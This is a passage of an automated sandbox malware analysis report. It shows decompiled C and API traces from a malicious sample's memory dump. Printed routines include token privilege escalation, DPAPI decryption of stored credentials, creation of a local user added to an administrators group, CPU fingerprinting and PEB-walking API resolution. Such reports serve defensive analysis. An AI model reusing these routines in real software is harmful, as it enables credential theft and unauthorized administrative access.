lstrlenA.KERNEL32(?,?,?,00000000,?,0103A1B0,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 0103A8E0
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0103A90E

Part of subcall function 01035FFA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,01033764,?,?,?,01042AE3,0104566F,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,0104563F,00000000,76B30770,00000000), ref: 01036004

lstrcpyA.KERNEL32(00000000,?), ref: 0103A95B

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
String ID:
API String ID: 573875632-0
Opcode ID: 1ef0cce08bdc7e65da1a5b133dea2f289e8f1a68c2d791fb5e6ecad4c1931500
Instruction ID: e50123955368f6b90ad34cf92e8aaea71ea91e8a7f8367342164368708042265
Opcode Fuzzy Hash: 1ef0cce08bdc7e65da1a5b133dea2f289e8f1a68c2d791fb5e6ecad4c1931500
Instruction Fuzzy Hash: E711B7BAD0020DAFDB11DFA4D8C48EEBBBDEF48344F1041AAF905A3240D7359A05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01040B38 Relevance: 4.6, APIs: 3, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01040B38(void* __ecx, WCHAR** __edx) {
				void* _v8;
				long _v12;
				struct _LUID _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				WCHAR** _t33;

				asm("stosd");
				asm("xorps xmm0, xmm0");
				_v8 = 0;
				_t33 = __edx;
				asm("movlpd [ebp-0x10], xmm0");
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
					L4:
					return 0;
				} else {
					_v36.Privileges = _v20.LowPart;
					_v28 = _v20.HighPart;
					_v36.PrivilegeCount = 1;
					_v24 = 2;
					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
						goto L4;
					}
					return 1;
				}
			}

0x01040b46
0x01040b49
0x01040b4c
0x01040b4f
0x01040b51
0x01040b56
0x01040b59
0x01040b5a
0x01040b5b
0x01040b6b
0x01040bb7
0x00000000
0x01040b7e
0x01040b84
0x01040b8d
0x01040b97
0x01040ba2
0x01040bb1
0x00000000
0x00000000
0x00000000
0x01040bb3

APIs

OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0103E02E), ref: 01040B63
LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 01040B74
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 01040BA9

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
String ID:
API String ID: 658607936-0
Opcode ID: 1f421c844d43f3336199174e80e4e8b5d9de2ca3feb6e58fe97d07374c98aded
Instruction ID: 636bf31c776e5e670e1a4817e01c7b067158652c4dca642cd002c92631085781
Opcode Fuzzy Hash: 1f421c844d43f3336199174e80e4e8b5d9de2ca3feb6e58fe97d07374c98aded
Instruction Fuzzy Hash: BA1100B5910219EBEB11CFA5DD84AEFBBBCFB48604F00456ABA41F2144E77499048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103C261 Relevance: 4.5, APIs: 3, Instructions: 46
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0103C261(intOrPtr __ecx, char __edx, intOrPtr _a20, void** _a24, long* _a28) {
				void* _v8;
				long _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _t16;
				void* _t18;
				long _t23;
				char* _t26;

				_v24 = __ecx;
				_v28 = __edx;
				_v20 = 0;
				_t16 =  &_v28;
				_v16 = 0;
				__imp__CryptUnprotectData(_t16, 0,  &_v20, 0, 0, _a20,  &_v12);
				_t26 = _t16;
				if(_t26 != 0) {
					_t23 = _v12;
					_t27 = _a28;
					 *_a28 = _t23;
					_t18 = LocalAlloc(0x40, _t23);
					 *_a24 = _t18;
					if(_t18 != 0) {
						E0103102C(_t18, _v8,  *_t27);
					}
					LocalFree(_v8);
				}
				return _t26;
			}

0x0103c26c
0x0103c275
0x0103c27d
0x0103c282
0x0103c285
0x0103c289
0x0103c28f
0x0103c293
0x0103c295
0x0103c298
0x0103c29e
0x0103c2a0
0x0103c2a9
0x0103c2ad
0x0103c2b5
0x0103c2ba
0x0103c2c0
0x0103c2c0
0x0103c2cb

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0103C289
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0103C23A,?,00000000,?,?,?,?,0103C1A9), ref: 0103C2A0
LocalFree.KERNEL32(0103C23A,?,?,?,?,?,0103C23A,?,00000000,?,?,?,?,0103C1A9), ref: 0103C2C0

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 4acc2f3bcef4a7db1084ad995c86a8163cdba6c84a0c0af580c9510ea4d4b3d9
Instruction ID: e1c6c622ea6fe5faf46f3706d54934fb6c3cabfc60be451f45323e2c615af8c1
Opcode Fuzzy Hash: 4acc2f3bcef4a7db1084ad995c86a8163cdba6c84a0c0af580c9510ea4d4b3d9
Instruction Fuzzy Hash: 4B0112F9900209AFDB159F94DD458EEBBBDEF88210F10056AFD41A2340E7759954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01041446 Relevance: 3.1, APIs: 2, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E01041446(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v56;
				struct _WIN32_FIND_DATAW _v648;
				intOrPtr _t39;
				void* _t62;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;

				_v20 = _v20 & 0x00000000;
				_t39 = 5;
				_t75 = __ecx;
				_v16 = _t39;
				_v24 = _t39;
				E010318C7( &_v28, __eflags);
				_t62 = FindFirstFileW(_a4,  &_v648);
				_t79 = _t62 - 0xffffffff;
				while(_t79 != 0) {
					_v56 = _v56 & 0x00000000;
					__eflags = _v648.dwFileAttributes & 0x00000010;
					if((_v648.dwFileAttributes & 0x00000010) == 0) {
						_t16 =  &_v40;
						 *_t16 = _v40 & 0x00000000;
						__eflags =  *_t16;
						_v48 = _v648.nFileSizeLow;
						_v44 = _v648.nFileSizeHigh;
					} else {
						asm("xorps xmm0, xmm0");
						_v40 = 1;
						asm("movlpd [ebp-0x2c], xmm0");
					}
					E01033549( &_v56, E010336F7( &_v12,  &(_v648.cFileName)));
					E01035FEB(_v12);
					_v12 = _v12 & 0x00000000;
					_t77 = _t77 - 0x18;
					_t76 = _t77;
					E0103373F(_t76,  &_v56);
					 *((intOrPtr*)(_t76 + 8)) = _v48;
					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
					 *(_t76 + 0x10) = _v40;
					E010317C8( &_v28);
					E01035FEB(_v56);
					__eflags = FindNextFileW(_t62,  &_v648);
				}
				E010313B3(_t75, _t79,  &_v28);
				_t73 = _v28;
				if(_v28 != 0) {
					E01031B27(_t73, _t73);
				}
				E01035FEB(_a4);
				return _t75;
			}

0x0104144f
0x01041458
0x01041459
0x0104145b
0x01041461
0x01041464
0x01041479
0x0104147b
0x0104151d
0x01041483
0x01041487
0x0104148e
0x010414ad
0x010414ad
0x010414ad
0x010414b1
0x010414b4
0x01041490
0x01041490
0x01041493
0x0104149a
0x0104149a
0x010414ca
0x010414d2
0x010414d7
0x010414de
0x010414e1
0x010414e6
0x010414f1
0x010414f7
0x010414fd
0x01041500
0x01041508
0x0104151b
0x0104151b
0x01041529
0x0104152e
0x01041533
0x01041536
0x01041536
0x0104153e
0x01041549

APIs

FindFirstFileW.KERNEL32(?,?,?,?), ref: 01041473
FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 01041515

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: f09fafbc791ce4bbe511bde590211a87638f3076c8fc9be99680b499c86fba72
Instruction ID: ee706b66130ee9bec73dbc59879a9c558f829289c406d9ff6f90ee2ab680565b
Opcode Fuzzy Hash: f09fafbc791ce4bbe511bde590211a87638f3076c8fc9be99680b499c86fba72
Instruction Fuzzy Hash: 3C317575D012099FCB14EFA5D984BEEBBF9AF98310F104569E445B3290DB74AA84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0103D2B8 Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0103D2B8(char _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				void _v36;
				void* _t22;
				intOrPtr* _t25;
				signed int _t30;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 = 8;
				memset( &_v36, 0, _t30 << 2);
				_v36 =  *_t38;
				_v24 = 1;
				_v20 = 0;
				_v32 =  *_a8;
				_t22 =  &_v36;
				_v16 = 0;
				_v12 = 0x10201;
				_v8 = 0;
				__imp__NetUserAdd(0, 1, _t22, 0);
				_t42 = _t22;
				if(_t22 != 0) {
					L3:
					__eflags = 0;
					return 0;
				}
				_a4 =  *_t38;
				_t25 = E01040A8C( &_a8, _t42);
				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
				E01035FEB(_a8);
				if(_t25 != 0) {
					goto L3;
				}
				return 1;
			}

0x0103d2c0
0x0103d2c8
0x0103d2ce
0x0103d2d4
0x0103d2dc
0x0103d2df
0x0103d2e4
0x0103d2e7
0x0103d2ed
0x0103d2f0
0x0103d2f7
0x0103d2fa
0x0103d300
0x0103d302
0x0103d333
0x0103d333
0x00000000
0x0103d333
0x0103d309
0x0103d30c
0x0103d31b
0x0103d326
0x0103d32d
0x00000000
0x00000000
0x00000000

APIs

NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0118AD78,?,?,?,0103E4D4,0118AD74,0118AD78), ref: 0103D2FA

Part of subcall function 01040A8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0103D311,?,?,00000001), ref: 01040AE1
Part of subcall function 01040A8C: LookupAccountSidW.ADVAPI32(00000000,0103D311,?,00000104,?,00000010,?), ref: 01040B06
Part of subcall function 01040A8C: GetLastError.KERNEL32(?,?,00000001), ref: 01040B10
Part of subcall function 01040A8C: FreeSid.ADVAPI32(0103D311,?,?,00000001), ref: 01040B1E

NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0103E4D4,0118AD74,0118AD78), ref: 0103D31B

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
String ID:
API String ID: 188019324-0
Opcode ID: ecef2b6c808dd53a1662ee6cfe3aa960f7769eb562ee2d5035a68ca201e3a80b
Instruction ID: 8aa563356b415a2d2be4ff09436634d441050ab7fca87c7deb0dd41052e7a530
Opcode Fuzzy Hash: ecef2b6c808dd53a1662ee6cfe3aa960f7769eb562ee2d5035a68ca201e3a80b
Instruction Fuzzy Hash: C1113076D00208AFDB11DFA9C9849EEF7FCFF98314B40852AF991E7210D7B49A448B90

Uniqueness

Uniqueness Score: -1.00%

Function 0103EDA9 Relevance: 3.1, APIs: 2, Instructions: 52
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103EDA9(intOrPtr* __ecx, char __edx) {
				char _v12;
				long _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v52;
				void _v56;
				void* _t14;
				char _t17;
				union _PROCESSINFOCLASS _t20;
				intOrPtr* _t29;
				intOrPtr _t31;

				_t29 = __ecx;
				_v12 = __edx;
				_t20 = 0;
				_t31 = 1;
				if( *__ecx != 1) {
					_t14 = GetCurrentProcess();
					_t31 =  *_t29;
				} else {
					_t14 =  *( *(__ecx + 4));
				}
				_v32 = _v12;
				_v28 = 0x1056970;
				_v20 = _t29;
				if(_t31 == 1 && NtQueryInformationProcess(_t14, _t20,  &_v56, 0x18,  &_v16) >= 0 && _v16 == 0x18) {
					_t17 = _v52;
					if(_t17 != 0) {
						_v24 = _t17;
						_t20 = E0103EE24( &_v32,  &_v24, 0x150);
					}
				}
				return _t20;
			}

0x0103edb2
0x0103edb4
0x0103edb9
0x0103edbb
0x0103edbe
0x0103edc7
0x0103edcd
0x0103edc0
0x0103edc3
0x0103edc3
0x0103edd2
0x0103edd5
0x0103eddc
0x0103ede2
0x0103ee00
0x0103ee05
0x0103ee0f
0x0103ee1b
0x0103ee1b
0x0103ee05
0x0103ee23

APIs

GetCurrentProcess.KERNEL32(00000001,C0000135,0103EAD8,?,?,?,?,?,?,?,?,?,0103EC60,?,00000000,?), ref: 0103EDC7
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 0103EDF0

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: d9587b712ad349e8a438c6f6fe04d033b40ad9a3d039992e9e0d91f222793c9a
Instruction ID: 4b2292d29f5a006871bf4c1f0fb1e3a1f1b1a3bd243db2a28fa696235d51343a
Opcode Fuzzy Hash: d9587b712ad349e8a438c6f6fe04d033b40ad9a3d039992e9e0d91f222793c9a
Instruction Fuzzy Hash: E30180B5E00219EFDB14DFD8D8848AEBBFCFB84351B104669E941A7280D770AE44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01040E5E Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E01040E5E(char __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				void* _v12;
				char _v28;
				char _v60;
				char _v76;
				char _v92;
				char _t23;
				char* _t34;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t50;
				intOrPtr _t52;
				char _t53;
				intOrPtr* _t59;
				void* _t60;

				_t50 = __edx;
				asm("movaps xmm0, [0x104a8f0]");
				_push(_t38);
				_v12 = __ecx;
				_t52 = 0x80000000;
				_push(_t38);
				asm("cpuid");
				asm("movups [ebp-0x18], xmm0");
				_t40 =  &_v28;
				 *_t40 = 0x80000000;
				 *((intOrPtr*)(_t40 + 4)) = _t38;
				 *((intOrPtr*)(_t40 + 8)) = 0;
				 *((intOrPtr*)(_t40 + 0xc)) = __edx;
				_t23 = _v28;
				_v8 = _t23;
				if(_t23 >= 0x80000000) {
					do {
						_push(_t40);
						asm("cpuid");
						_t59 = _t40;
						_t40 =  &_v28;
						 *_t40 = _t52;
						 *((intOrPtr*)(_t40 + 4)) = _t59;
						 *((intOrPtr*)(_t40 + 8)) = 0;
						 *((intOrPtr*)(_t40 + 0xc)) = _t50;
						if(_t52 != 0x80000002) {
							__eflags = _t52 - 0x80000003;
							if(_t52 != 0x80000003) {
								__eflags = _t52 - 0x80000004;
								if(_t52 == 0x80000004) {
									_push(0x10);
									_push( &_v28);
									_t34 =  &_v60;
									goto L7;
								}
							} else {
								_push(0x10);
								_push( &_v28);
								_t34 =  &_v76;
								goto L7;
							}
						} else {
							_push(0x10);
							_push(_t40);
							_t34 =  &_v92;
							L7:
							_push(_t34);
							E0103102C();
							_t60 = _t60 + 0xc;
						}
						_t52 = _t52 + 1;
						_t64 = _t52 - _v8;
					} while (_t52 <= _v8);
				}
				_t57 = E01031085(0x200);
				E0103102C(_t24,  &_v92, 0x40);
				_t53 = _v12;
				E010331AF(E010334D1( &_v12, _t57), _t64, _t53);
				E01035FEB(_v12);
				E01031099(_t57);
				return _t53;
			}

0x01040e5e
0x01040e64
0x01040e6b
0x01040e6e
0x01040e71
0x01040e7a
0x01040e7b
0x01040e7f
0x01040e84
0x01040e87
0x01040e89
0x01040e8c
0x01040e8f
0x01040e92
0x01040e95
0x01040e9a
0x01040e9c
0x01040ea0
0x01040ea1
0x01040ea3
0x01040ea6
0x01040ea9
0x01040eab
0x01040eae
0x01040eb1
0x01040eba
0x01040ec6
0x01040ecc
0x01040ed9
0x01040edf
0x01040ee4
0x01040ee6
0x01040ee7
0x00000000
0x01040ee7
0x01040ece
0x01040ed1
0x01040ed3
0x01040ed4
0x00000000
0x01040ed4
0x01040ebc
0x01040ebe
0x01040ec0
0x01040ec1
0x01040eea
0x01040eea
0x01040eeb
0x01040ef0
0x01040ef0
0x01040ef3
0x01040ef4
0x01040ef4
0x01040e9c
0x01040f03
0x01040f0c
0x01040f11
0x01040f23
0x01040f2b
0x01040f31
0x01040f3d

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdc9b2dd7898a178f666061df758dc78d3329ec790a179f76ec6e681336c2dbc
Instruction ID: 661e466277f756837d26f2a89f54e581d42c20945bce7df1e1362ea7a6323f6a
Opcode Fuzzy Hash: cdc9b2dd7898a178f666061df758dc78d3329ec790a179f76ec6e681336c2dbc
Instruction Fuzzy Hash: F021DBB1E002099FDB11DF99C8C1AEEBBBCAF84310F14407AF645FB245E671698587A4

Uniqueness

Uniqueness Score: -1.00%

Function 01043279 Relevance: .1, Instructions: 63
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E01043279(void* __ecx, signed int __edx, signed int _a4, signed int* _a8) {
				void* _t13;
				signed int* _t25;
				void* _t26;
				signed int _t33;
				signed int _t35;
				signed int _t42;
				signed int _t43;
				signed int _t48;
				signed int _t49;
				signed char* _t52;

				_t33 = __edx;
				asm("cdq");
				_t42 = __edx & 0x00000003;
				_t43 = _a4;
				_t48 = _t42 + __edx >> 2;
				_t52 = __ecx + _t48 * 4;
				_t49 =  ~_t48;
				if(_t42 != 0) {
					do {
						asm("rol eax, 0xf");
						asm("rol eax, 0xd");
						_t43 = ( *(_t52 + _t49 * 4) * 0xcc9e2d51 * 0x1b873593 ^ _t43) * 5 - 0x19ab949c;
						_t49 = _t49 + 1;
					} while (_t49 != 0);
				}
				_t35 = 0;
				_t13 = (_t33 & 0x00000003) - 1;
				if(_t13 == 0) {
					L7:
					asm("rol eax, 0xf");
					_t43 = _t43 ^ ( *_t52 & 0x000000ff ^ _t35) * 0xcc9e2d51 * 0x1b873593;
				} else {
					_t26 = _t13 - 1;
					if(_t26 == 0) {
						L6:
						_t35 = _t35 ^ (_t52[1] & 0x000000ff) << 0x00000008;
						goto L7;
					} else {
						if(_t26 == 1) {
							_t35 = (_t52[2] & 0x000000ff) << 0x10;
							goto L6;
						}
					}
				}
				_t25 = _a8;
				 *_t25 = (((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b >> 0x0000000d ^ ((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010 ^ (((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b >> 0x0000000d ^ ((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b) * 0xc2b2ae35;
				return _t25;
			}

0x0104327d
0x01043281
0x01043282
0x0104328a
0x0104328d
0x01043290
0x01043293
0x01043295
0x01043297
0x0104329e
0x010432a9
0x010432af
0x010432b5
0x010432b5
0x01043297
0x010432bc
0x010432c1
0x010432c4
0x010432e0
0x010432eb
0x010432f4
0x010432c6
0x010432c6
0x010432c9
0x010432d7
0x010432de
0x00000000
0x010432cb
0x010432ce
0x010432d4
0x00000000
0x010432d4
0x010432ce
0x010432c9
0x0104331c
0x0104331f
0x01043322

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee9a03c5baf9720a6e7d8e5d675cdaadf48f2bf7d7bc5066cbb6e6d82dfa4c0b
Instruction ID: 2788a3e6cc25f1cb9db138a78578ee51d43c6db81bc3ad5f3e45ef63dbd0bbd1
Opcode Fuzzy Hash: ee9a03c5baf9720a6e7d8e5d675cdaadf48f2bf7d7bc5066cbb6e6d82dfa4c0b
Instruction Fuzzy Hash: D91144723146210B976D883E4E97067FFDBE3C9010788997EE99BCF692E431E3068680

Uniqueness

Uniqueness Score: -1.00%

Function 01041B3F Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01041B3F() {
				intOrPtr* _t10;
				intOrPtr* _t11;

				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
				_t11 =  *_t10;
				while(_t11 != _t10) {
					if(E01041BFD( *((intOrPtr*)(_t11 + 0x28))) == 0) {
						return  *((intOrPtr*)(_t11 + 0x10));
					}
					_t11 =  *_t11;
				}
				return 0;
			}

0x01041b4a
0x01041b4d
0x01041b5f
0x01041b5b
0x00000000
0x01041b68
0x01041b5d
0x01041b5d
0x00000000

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
Instruction ID: c54931d2af2406f81286835c63e0509405531573cf919ecaa46cc4e16175cbb5
Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
Instruction Fuzzy Hash: F8E08C722005108BC761DB1DD88095AF3F6EB9017471A04B8D4CAA3611E330FC81C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 01041E6D Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01041E6D() {
				intOrPtr _t4;

				_t4 =  *[fs:0x30];
				if(_t4 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
				}
			}

0x01041e6d
0x01041e75
0x01041e87
0x01041e77
0x01041e84
0x01041e84

Memory Dump Source

